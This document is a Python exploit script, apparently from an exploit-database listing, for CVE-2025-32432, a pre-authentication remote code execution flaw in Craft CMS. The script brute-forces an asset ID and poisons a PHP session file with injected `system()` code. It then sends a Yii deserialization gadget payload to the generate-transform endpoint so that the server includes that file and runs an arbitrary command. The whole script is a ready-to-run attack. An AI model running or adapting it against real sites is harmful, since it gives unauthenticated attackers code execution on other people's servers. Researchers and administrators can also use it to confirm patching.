# Exploit Title: Craft CMS 5.6.16 - RCE
# Google Dork: N/A
# Date: 2026-01-24
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Vendor Homepage: https://craftcms.com
# Software Link: https://github.com/craftcms/cms
# Version: <= 3.9.14, <= 4.14.14, <= 5.6.16
# Tested on: Linux, Apache/Nginx, PHP 8.x
# CVE: CVE-2025-32432
#
# Description:
# Craft CMS contains a pre-authentication remote code execution vulnerability
# in the assets/generate-transform endpoint. By abusing a Yii deserialization
# gadget chain (FieldLayoutBehavior → PhpManager) and poisoning a PHP session
# file, an unauthenticated attacker can achieve arbitrary command execution.
#

import requests
import argparse
import time
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def find_asset_id(base_url, max_attempts=300):
    """
    Brute-force search for a valid Asset ID.
    This is optional and may be unreliable on some installations.
    """
    session = requests.Session()
    session.verify = False

    print("[*] Brute-forcing Asset ID (best-effort)...")

    for asset_id in range(1, max_attempts + 1):
        url = f"{base_url}/actions/assets/generate-transform"
        payload = {
            "assetId": asset_id,
            "handle": {
                "width": 1,
                "height": 1,
                "as hack": {
                    "class": "craft\\behaviors\\FieldLayoutBehavior",
                    "__class": "yii\\rbac\\PhpManager",
                    "__construct()": [
                        {
                            "itemFile": "invalid"
                        }
                    ]
                }
            }
        }

        try:
            r = session.post(url, json=payload, timeout=5)
            if r.status_code != 404:
                print(f"[+] Potential valid Asset ID found: {asset_id} (HTTP {r.status_code})")
                return asset_id
        except:
            continue

    print(f"[-] No valid Asset ID found after {max_attempts} attempts.")
    return None


def implant_php(base_url, cmd):
    """
    Step 1: Poison the PHP session file with injected PHP code.
    This relies on old-style behavior where query parameters are written
    into the session file without sanitization.
    """

    injection = f"<?php system('{cmd}'); ?>"
    url = f"{base_url}/index.php?p=admin/dashboard&a={injection}"

    try:
        r = requests.get(url, verify=False, timeout=10)
        if r.status_code == 200:
            print(f"[+] Session poisoning request sent successfully")
            return True
        else:
            print(f"[-] Injection failed (HTTP {r.status_code})")
            return False
    except Exception as e:
        print(f"[-] Injection error: {e}")
        return False


def execute_command(base_url, asset_id, session_id):
    """
    Step 2: Trigger deserialization and force PhpManager to include
    the poisoned session file from /tmp/sess_<PHPSESSID>.
    """

    url = f"{base_url}/actions/assets/generate-transform"

    payload = {
        "assetId": asset_id,
        "handle": {
            "width": 1,
            "height": 1,
            "as hack": {
                "class": "craft\\behaviors\\FieldLayoutBehavior",
                "__class": "yii\\rbac\\PhpManager",
                "__construct()": [
                    {
                        "itemFile": f"/tmp/sess_{session_id}"
                    }
                ]
            }
        }
    }

    try:
        r = requests.post(url, json=payload, verify=False, timeout=15)
        return r.text
    except Exception as e:
        return f"[-] Execution request failed: {e}"


def main():
    parser = argparse.ArgumentParser(
        description="CVE-2025-32432 - Craft CMS Pre-Auth Remote Code Execution"
    )
    parser.add_argument("-u", "--url", required=True,
                        help="Target base URL (e.g. https://victim.com)")
    parser.add_argument("-c", "--cmd", required=True,
                        help="Command to execute (e.g. id, whoami)")
    parser.add_argument("-a", "--asset", type=int,
                        help="Known valid Asset ID (recommended)")
    parser.add_argument("-s", "--scan-max", type=int, default=300,
                        help="Max Asset ID brute-force range (optional)")

    args = parser.parse_args()

    base_url = args.url.rstrip('/')
    session = requests.Session()
    session.verify = False

    # Step 0: Obtain PHP session ID
    try:
        r = session.get(f"{base_url}/index.php", verify=False, timeout=10)
        session_id = session.cookies.get("PHPSESSID", None)

        if not session_id:
            print("[-] Failed to obtain PHPSESSID")
            return

        print(f"[+] Obtained PHPSESSID: {session_id}")

    except Exception as e:
        print(f"[-] Failed to establish session: {e}")
        return

    # Determine Asset ID
    asset_id = args.asset
    if not asset_id:
        asset_id = find_asset_id(base_url, args.scan_max)
        if not asset_id:
            print("[-] Exploitation aborted: no valid Asset ID found")
            return

    print(f"[+] Using Asset ID: {asset_id}")

    # Step 1: Poison session file
    if not implant_php(base_url, args.cmd):
        print("[-] Session poisoning failed")
        return

    print("[*] Waiting for session file to be written...")
    time.sleep(2)

    # Step 2: Trigger RCE
    print(f"[*] Triggering command execution: {args.cmd}")
    output = execute_command(base_url, asset_id, session_id)

    # Output handling
    print("\n[+] Server response:")
    print(output[:2000])


if __name__ == "__main__":
    print("=== CVE-2025-32432 - Craft CMS Pre-Auth RCE Exploit ===")
    main()